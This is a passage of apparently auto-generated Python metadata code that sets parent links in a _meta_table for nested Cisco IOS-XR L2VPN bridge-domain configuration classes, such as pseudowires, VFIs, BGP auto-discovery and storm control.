_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info']
